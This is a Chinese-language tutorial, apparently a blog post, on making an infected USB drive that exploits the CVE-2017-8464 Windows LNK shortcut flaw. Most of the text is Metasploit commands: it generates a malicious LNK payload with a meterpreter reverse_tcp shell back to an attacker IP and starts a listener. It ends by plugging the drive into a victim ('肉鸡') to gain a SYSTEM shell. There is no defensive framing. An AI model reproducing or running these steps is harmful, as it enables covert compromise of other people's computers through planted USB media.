利用CVE-2017-8464漏洞制作病毒U盘攻击
利用CVE-2017-8464漏洞制作病毒U盘
漏洞简介
在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。
病毒U盘制作
使用kali中msfconsole攻击模块生成病毒U盘文件。
1、启动msfconsole
2、搜索漏洞攻击模块
search CVE-2017-8464
3、使用LNK漏洞攻击模块(复制编号0的攻击模块)
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
show options
4、设置payload
set payload windows/meterpreter/reverse_tcp
5、设置LHOST(攻击机IP地址)
set lhost 192.168.1.213 (改为自己攻击机器IP)
6、运行攻击模块
exploit
7、在/root/.msf4/local/目录下生成了对应的病毒文件
8、将上一步生成的所有文件复制到U盘中,如上图所示文件
9、在kali中开启监听
use exploit/multi/handler
10、设置payload
set payload windows/meterpreter/reverse_tcp
11、配置lhost
set lhost 192.168.1.213 (改为自己攻击机的IP)
12、启动监听模块
exploit
13、将U盘插入肉鸡中,kali成功创建了session
14、成功拿到system权限shell
漏洞说明:
利用kali生成的病毒文件会直接反弹一个shell,我们也可以自己编写cpl恶意代码文件来实现攻击效果,具体实现看上一篇文章
LNK文件生成器:Github